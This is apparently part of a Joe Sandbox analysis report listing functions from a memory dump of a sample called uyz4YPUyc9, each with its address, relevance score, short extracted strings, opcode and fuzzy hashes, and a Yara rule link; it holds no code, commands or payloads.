8Q_H, xrefs: 00007FF848F3976D

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 8Q_H
API String ID: 0-1015137260
Opcode ID: b8164d6f30b5c9efffa4c37d0f8826231677bedd5d5ffc74cd1e45ead7181d0a
Instruction ID: a11d3123844f63b64f4357d8c2a4d6297997be77e7e8aa8f61f72b78ea326aa9
Opcode Fuzzy Hash: b8164d6f30b5c9efffa4c37d0f8826231677bedd5d5ffc74cd1e45ead7181d0a
Instruction Fuzzy Hash: AA716F30E18A4E9FD789EF68C4546ADBBE1FF99340F54417AE049D36D6CB38A842CB44

Function 00007FF848F13E1B Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F13FA7

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: 163b5b7ebfecb9080f79abf6116f28c817c0c77b0d43339481e6f82bc50118b3
Instruction ID: dc97677de42c03f263292c31512310c9312ffadfac889cb15d8c5fb6df1d9f8a
Opcode Fuzzy Hash: 163b5b7ebfecb9080f79abf6116f28c817c0c77b0d43339481e6f82bc50118b3
Instruction Fuzzy Hash: E451E530B1AA4A8FE784B77C841576976E2EF99744F1441B9D008C72E3DE2DEC418715

Function 00007FF848F4D298 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

mL_L, xrefs: 00007FF848F511A4

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: mL_L
API String ID: 0-3552692294
Opcode ID: 8c137668af29d3aa65a19ba5d880dcede718cd55b079265fe1114ab10a561c71
Instruction ID: a7e6ad71449d50495175848c43033da3f1e01cec309d09533caa9c8d4e518e8d
Opcode Fuzzy Hash: 8c137668af29d3aa65a19ba5d880dcede718cd55b079265fe1114ab10a561c71
Instruction Fuzzy Hash: 3551E130A1CE0A4FE758EB1CD885A71B3E1FFA9354F150679D44EC7297EA25F8828784

Function 00007FF848F21C50 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F2398B

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: 21cdd0642db0002e2395d50b9ca1214923530ef5a87606a1bbde0717eedcc9e4
Instruction ID: 3fb6d25fb17025b69c4deca606e68e3dc5d015fdb8e8b1954646c46464c6111f
Opcode Fuzzy Hash: 21cdd0642db0002e2395d50b9ca1214923530ef5a87606a1bbde0717eedcc9e4
Instruction Fuzzy Hash: A351A371F0C95D8FDB85FB2CA8155A97BE1FF99344F0500B9D40DD72E2DA2AA801C746

Function 00007FF848F46AC8 Relevance: 1.4, Instructions: 1430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79b4638ce92f1ddea8d608fcdef7e45e988c66a648d0f6cb3653b668fe92bfa6
Instruction ID: 68e0adfcbe1426f327629b0e6045cc5f57b04e3eb59015270bd947a7fd79288d
Opcode Fuzzy Hash: 79b4638ce92f1ddea8d608fcdef7e45e988c66a648d0f6cb3653b668fe92bfa6
Instruction Fuzzy Hash: 99925830E0CA8A4FE759B73888151B93BE1EF96750F1442BAD48AD71D7EF28AC438355

Function 00007FF848F22000 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F24301

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: f4920a92d21d031b92d394e5094aa456a5d20d449bdbb9b591b2464ec146bc12
Instruction ID: 7b7b0a94ed39859da9d549f1a6759e531e5410836603b025385da6b17cbb9596
Opcode Fuzzy Hash: f4920a92d21d031b92d394e5094aa456a5d20d449bdbb9b591b2464ec146bc12
Instruction Fuzzy Hash: 5751B031A08D0D8FD794EB6CA4446A9B7E2FFA9361F00427AD40DC32D1DF36AC518794

Function 00007FF848F1A3E5 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

(8CH, xrefs: 00007FF848F1A4FE

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (8CH
API String ID: 0-3454613889
Opcode ID: 458aced5294f44c32bb866d1a40870d3e6f9a64a60ea1a99c0c1232e00e498c0
Instruction ID: 8a0ac881e1f1e42459ddf6356b3691b65dfec9599f7fec6762128a5e3976e88e
Opcode Fuzzy Hash: 458aced5294f44c32bb866d1a40870d3e6f9a64a60ea1a99c0c1232e00e498c0
Instruction Fuzzy Hash: 5351D33090DA8A4FE786EB38C8556AA7BB1EF4A380F0505F6D408CB1E3CE396D55C764

Function 00007FF848F26C90 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

0_CH, xrefs: 00007FF848F29A44

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 0_CH
API String ID: 0-366779220
Opcode ID: 378dea5ad6fcdf90809775b2247ca8cd20632e89d82d43843a23f6a98ec3cafd
Instruction ID: deb85d49ba5669b24765091cee3cbbb3c71bcd0ea93414456619acf71289863f
Opcode Fuzzy Hash: 378dea5ad6fcdf90809775b2247ca8cd20632e89d82d43843a23f6a98ec3cafd
Instruction Fuzzy Hash: 2F51F422A1EA864FE346B73C64651E67BE0EF46258F0842F7D08CCB1D3DE1D58468359

Function 00007FF848F25D22 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

p]CH, xrefs: 00007FF848F25E38

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: p]CH
API String ID: 0-2370574087
Opcode ID: 9fcbea070624923866deff9238c5e5a6412742a6c9aacadc80ac30536b3f0f01
Instruction ID: ff9990ab3e3e00e4835491766fb066b1bfd4bd769621611bb0825c26d76e2afe
Opcode Fuzzy Hash: 9fcbea070624923866deff9238c5e5a6412742a6c9aacadc80ac30536b3f0f01
Instruction Fuzzy Hash: 2A41283154DBC94FD787AB7898155E67FF0EF4B360B0901EBD448CB093DA1A591AC3A2

Function 00007FF848F372ED Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

"DH, xrefs: 00007FF848F37480

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: "DH
API String ID: 0-4236562523
Opcode ID: b1f6ce62af7aa2fdb2b52ba40ea9ce32496860a0b819f198b9cab98a48549b7f
Instruction ID: b19ef42bab0ae94eb365d88a77c27d8ae68ea36e67cf4c6621931d58143a98e0
Opcode Fuzzy Hash: b1f6ce62af7aa2fdb2b52ba40ea9ce32496860a0b819f198b9cab98a48549b7f
Instruction Fuzzy Hash: F8410830A1DA558FE749AB6CA4157A977E1FF99780F1441BEF00CC32D7CE2C6C018699

Function 00007FF848F26CA8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

0_CH, xrefs: 00007FF848F29A44

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 0_CH
API String ID: 0-366779220
Opcode ID: 3f580d9a9a3db11fc2b1738ef346951c0088f0f95558999205c9ef731e9f7b6f
Instruction ID: cab12a4ae6b162c788eda1aedc18b7d3dba3f4994447af3078ea8b47c8443599
Opcode Fuzzy Hash: 3f580d9a9a3db11fc2b1738ef346951c0088f0f95558999205c9ef731e9f7b6f
Instruction Fuzzy Hash: E941E422A1EA868FE346B76C64651E6BBE0EF46258F0842F7D08CCB1D3DE1D58458359

Function 00007FF848F21F48 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F230B9

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: 63829f0f3e534a8096d37adb93938027c99ac49b4c27b4198949e837738a91ba
Instruction ID: 72ce3719867c46c8584c2152765ccde3537e6317077d22c6d59c26f53a8e6bb9
Opcode Fuzzy Hash: 63829f0f3e534a8096d37adb93938027c99ac49b4c27b4198949e837738a91ba
Instruction Fuzzy Hash: 99414772E0CD8D4FE755E76CA4046B97BA1FF9A3A4F1501BAD00CC71E6EA25AC018355

Function 00007FF848F21F58 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F230B9

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: 2761d6e0b992874ef75312683380964c5c39a4a63d36273ba5ab82f2f2f63af9
Instruction ID: faf16790dc9e77df0fdff85a0f9ac10089923b2e305b2c2178e13059a09eb009
Opcode Fuzzy Hash: 2761d6e0b992874ef75312683380964c5c39a4a63d36273ba5ab82f2f2f63af9
Instruction Fuzzy Hash: E7316A72D0CD8D4FE755E76C64045B97BA0FF9A3A4F0401BBC00CC71D6EA2A68018359

Function 00007FF848F39EBD Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

k+, xrefs: 00007FF848F39F18

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: k+
API String ID: 0-3464814512
Opcode ID: 3b5a4532c245d49a9f0438c5288ad7110552cd7ec24164e60a55e9e90e576c1f
Instruction ID: 642f605250631f2bfa8293f4555f2f80c31b25f24685891d8d97f52cb706b219
Opcode Fuzzy Hash: 3b5a4532c245d49a9f0438c5288ad7110552cd7ec24164e60a55e9e90e576c1f
Instruction Fuzzy Hash: 95418F70B2CE0A8FE749EB2984563B5B7E1FB95251F40413FD08EC2A92DF39B4418B85

Function 00007FF848F44C0E Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

`#DH, xrefs: 00007FF848F44D2A

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: `#DH
API String ID: 0-3430650629
Opcode ID: e32a529169a8bd940219f2b1d46a8e40a608f9805fc4bee47cbbef4f1cc8b129
Instruction ID: 97ac9d2b01ab6d97f73e3037bc6babe10648297ef0ff1b6a753819f4a6d70023
Opcode Fuzzy Hash: e32a529169a8bd940219f2b1d46a8e40a608f9805fc4bee47cbbef4f1cc8b129
Instruction Fuzzy Hash: 25410630B0D9494FEB88EB2C84543B873E2EFA9794F0841B9D04DD72D6CE38AC068795

Function 00007FF848F242A2 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F24301

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: d38106b91cf873c843a0e648a1d8b4ae1e03151f81635e565b3e0a127443d281
Instruction ID: a7bf73200f466f61403965aa3f1e4e648d3abdae1a04f8d831d7786fbf1fae4a
Opcode Fuzzy Hash: d38106b91cf873c843a0e648a1d8b4ae1e03151f81635e565b3e0a127443d281
Instruction Fuzzy Hash: ED31243190EA8E4FD782EB6898142A57FE1FFAA360F0542FBD40CC71D2DA2A5C558395

Function 00007FF848F21F28 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F230B9

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: 4dfe8f9588409d464d2e0292780f7dce7e698eb7109525d623182c88b93f80e5
Instruction ID: c8f71bab047c0cfa41b49fb4474067894cf094bce48b40f97139bf5b7c422fda
Opcode Fuzzy Hash: 4dfe8f9588409d464d2e0292780f7dce7e698eb7109525d623182c88b93f80e5
Instruction Fuzzy Hash: 41313972E0DD9A4FE795E7AC64042796BE0FF967A4F0501B6C00CC71D6EF29AC418359

Function 00007FF848F26D30 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

(_CH, xrefs: 00007FF848F29A14

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (_CH
API String ID: 0-2154947620
Opcode ID: 1df92fca4f0a7b24bc7c490c2f4ca52ddd48d2b0902bad21e4fa40c073e426ce
Instruction ID: 28dd53a1c6b282f860048da703f24456af5f5518a645c9b3488396421437fa96
Opcode Fuzzy Hash: 1df92fca4f0a7b24bc7c490c2f4ca52ddd48d2b0902bad21e4fa40c073e426ce
Instruction Fuzzy Hash: 8C319331A1DBC54FE386A77C9428661BBE0EF56340F1844FEC049CB5E3DA2AAC498715

Function 00007FF848F26D08 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

0_CH, xrefs: 00007FF848F29A44

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 0_CH
API String ID: 0-366779220
Opcode ID: c113bfa8fbd84026155ce8b6ed981ca01d5b6f5079ad5abbda1b93f876754958
Instruction ID: 7ab28eae343817f1ae7c6992b15bd03d2246797735d1c22a695f6d33b03c0161
Opcode Fuzzy Hash: c113bfa8fbd84026155ce8b6ed981ca01d5b6f5079ad5abbda1b93f876754958
Instruction Fuzzy Hash: 94312430A1DA8A8FE386B73C60242A5BBE0FF16344F0845FAC04DCB6D3CE2DA8058355

Function 00007FF848F2A4D6 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F2A5C9

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 40fd6aa5be9a687efe2322330a1bc94905f0549730e334bc617d90242964189f
Instruction ID: df49d4fe3c7cb3d02de7f67d78db82f736405163f568077320fc5172850185a6
Opcode Fuzzy Hash: 40fd6aa5be9a687efe2322330a1bc94905f0549730e334bc617d90242964189f
Instruction Fuzzy Hash: B631492190DBCA0FD383977C94152967FE2EF8A260F0941FBD488C71D7CA2D98478356

Function 00007FF848F1A281 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

0_CH, xrefs: 00007FF848F1A2E6

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 0_CH
API String ID: 0-366779220
Opcode ID: d36d3b17abf34e9d00b1f1a10fdf410995cc777366524ca3452e9464325e2d6e
Instruction ID: 76bc6febb3eb81d2f2e4e728fcdf2f4174c02297a93b411eeda524e7b8b8bc0b
Opcode Fuzzy Hash: d36d3b17abf34e9d00b1f1a10fdf410995cc777366524ca3452e9464325e2d6e
Instruction Fuzzy Hash: E421A16495E6D65FE793A77808206727FA4CF87365B1800EAE0D8CB1D7DA0D1C86C36A

Function 00007FF848F1A4D0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

(8CH, xrefs: 00007FF848F1A4FE

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (8CH
API String ID: 0-3454613889
Opcode ID: ab940f64c33a2b550f9bc257f22b5168fcda0b5d2e34f681614aaed3f2ce2eb4
Instruction ID: 99d5d247b4d92cf66e4611beccaeebc2b7cc44e2f8feed8e3d36497eb2c099cb
Opcode Fuzzy Hash: ab940f64c33a2b550f9bc257f22b5168fcda0b5d2e34f681614aaed3f2ce2eb4
Instruction Fuzzy Hash: FA216F30A09A5E8FDB85EB3884016A97BF1EF4A384F1505AAD418CB196DB396D50C794

Function 00007FF848F108A9 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F108C7

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: 726ee874effd8d9a2adfa49b2a25f6319c5a27416e677a4cea329a8150c38e7e
Instruction ID: 1fdfa79ccdf361cb74c059f7b43e1a45fd51ef3ca4c966c2c5a8e8a6dbf3d4b6
Opcode Fuzzy Hash: 726ee874effd8d9a2adfa49b2a25f6319c5a27416e677a4cea329a8150c38e7e
Instruction Fuzzy Hash: A9210572D0EADA5FE38AB73C55651A87BA0FFD6260F0901FBC048CB1D7DA081C458395

Function 00007FF848F374A5 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

"DH, xrefs: 00007FF848F374CC

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: "DH
API String ID: 0-4236562523
Opcode ID: 0632c02d692ceaf4a192d835c0c03db2cc97b232cb479151568c0840b2e2e9d6
Instruction ID: 1f97d868eaa71e4e8ae1ac9664afc65ac80e2b986c009df0f902e680c7fc311c
Opcode Fuzzy Hash: 0632c02d692ceaf4a192d835c0c03db2cc97b232cb479151568c0840b2e2e9d6
Instruction Fuzzy Hash: 62018F3160DD0A8FEB88F768D4617B87692EF8A394F50007AD01EC32D2CF2EAC519795

Function 00007FF848F1A2E0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

0_CH, xrefs: 00007FF848F1A2E6

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 0_CH
API String ID: 0-366779220
Opcode ID: c505630cbedeb89487e812bbc11cf40d731bf458625fc6ef0969eca3b0382fad
Instruction ID: d7b461d10a24fe85aab1428ef7477fe0c2369739738cb10a753e71525d5a46d6
Opcode Fuzzy Hash: c505630cbedeb89487e812bbc11cf40d731bf458625fc6ef0969eca3b0382fad
Instruction Fuzzy Hash: 01F03A20B28D6A1FEA89F72C55113B862D1DF8E794F4500EAD84DC72D7DE2D2C814795

Function 00007FF848F22640 Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

(_CH, xrefs: 00007FF848F2293A

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (_CH
API String ID: 0-2154947620
Opcode ID: a03710b37a0c214d3f1ab4871d87c26c7e64c62895151a90922aeb7c2a2404da
Instruction ID: e04ccb4fbfc2669633c42a6edabb37ef96f655fc490bc19e1645bd3efa0fc09c
Opcode Fuzzy Hash: a03710b37a0c214d3f1ab4871d87c26c7e64c62895151a90922aeb7c2a2404da
Instruction Fuzzy Hash: 90F06C2691F5926FD311B77CB8B10E67FA0EF4216EB184177D1DC4D053E91D144AC399

Function 00007FF848F281B1 Relevance: .8, Instructions: 835COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe53bbe3a07185016ab8b35b70755d05652875e5fed21162e4639d32f35ab60
Instruction ID: 83df5f8df95d37ab0ebe0d9109c826b8f45e45dbc87a6d0aeb299c69ba28550d
Opcode Fuzzy Hash: 8fe53bbe3a07185016ab8b35b70755d05652875e5fed21162e4639d32f35ab60
Instruction Fuzzy Hash: 0542D530A1CA498FE789EB2CD45466577E2FF9A390F6440A9C40DCB2D7CE3AAC42C755

Function 00007FF848F43A00 Relevance: .8, Instructions: 769COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0eeb054c6d0803c79ceea20e475c22cb37d8f2c45d9c064351db22d24d6cc0
Instruction ID: df1dda5842f0838f40849c1745d26b9430b7fabab97c701b7629a1e10ba9ca90
Opcode Fuzzy Hash: ab0eeb054c6d0803c79ceea20e475c22cb37d8f2c45d9c064351db22d24d6cc0
Instruction Fuzzy Hash: 61322430A0DA8A4FE79AA73888542B57BE1EF66B40F1540BBC08EC71D3DF2D6C468755

Function 00007FF848F22588 Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce4adb0c5fa06027a6b0b2ffb76099cf24c6e3c23eedc6e819ae619586235d7a
Instruction ID: 109ecf1d747799a96c49dd6eec364eae97aa50450c6eb410d6a7e4747b7739ea
Opcode Fuzzy Hash: ce4adb0c5fa06027a6b0b2ffb76099cf24c6e3c23eedc6e819ae619586235d7a
Instruction Fuzzy Hash: 35224A30A1CA0A4FD749F72CE4555B9B7E2FF89350F0446BAD44EC32D7DE29A8828785

Function 00007FF848F2CC95 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5464b8680ec1d399ac53b3b32ad27d28013a02e44ed3ed10b3e2c6b813761f
Instruction ID: 4f1ce9a6ae88b9b88a0f86f17754ff4f4ceb2f449373c448b5724bb4aff8ca99
Opcode Fuzzy Hash: 2a5464b8680ec1d399ac53b3b32ad27d28013a02e44ed3ed10b3e2c6b813761f
Instruction Fuzzy Hash: CA125130A1CA1D4FDB58FB58D895AB9B3E1FB98300F104679D44EC7296DE35B882CB85

Function 00007FF848F1C3D2 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9136732896ca2976a80621233d97a1eee68dbd2681eb475f7c541f798b8e5cac
Instruction ID: b74726a14f86071ad4decfe7f883a52ecc8a79882a74c72f4e149eddcd2eadf9
Opcode Fuzzy Hash: 9136732896ca2976a80621233d97a1eee68dbd2681eb475f7c541f798b8e5cac
Instruction Fuzzy Hash: 73121530A0DA8A8FDB89EF28C8506A57BE1FF5A350F1401A9D45DCB2D6DB39AC42C751

Function 00007FF848F4215D Relevance: .6, Instructions: 553COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42ce31cfc4f98f246cf496246ce4658b0518c777d0ccd1a31266ff2f112f1ce
Instruction ID: a74eca3d2a90010d507eaaf8c39f925d1485193d925a778b8ad0b2156f452cbb
Opcode Fuzzy Hash: d42ce31cfc4f98f246cf496246ce4658b0518c777d0ccd1a31266ff2f112f1ce
Instruction Fuzzy Hash: BAF12F30B2C9094FE698FB688465A7973D2FFA9351F51417AE05EC72E2DF28EC418744

Function 00007FF848F4B398 Relevance: .5, Instructions: 512COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b906adcb6cbaf5f77da6d8063c28dcf22b606f642b948d4bb9d638abd0dc6f05
Instruction ID: 4847cb1d405ad8f5ba9ea729f9a62b2bff64c51309eaf6c33d40b761e977e48c
Opcode Fuzzy Hash: b906adcb6cbaf5f77da6d8063c28dcf22b606f642b948d4bb9d638abd0dc6f05
Instruction Fuzzy Hash: 5BD12831B1CD1A4FE698EB2CA8196B977D1EF997A0F0501BBE40DC72D2DE199C424385

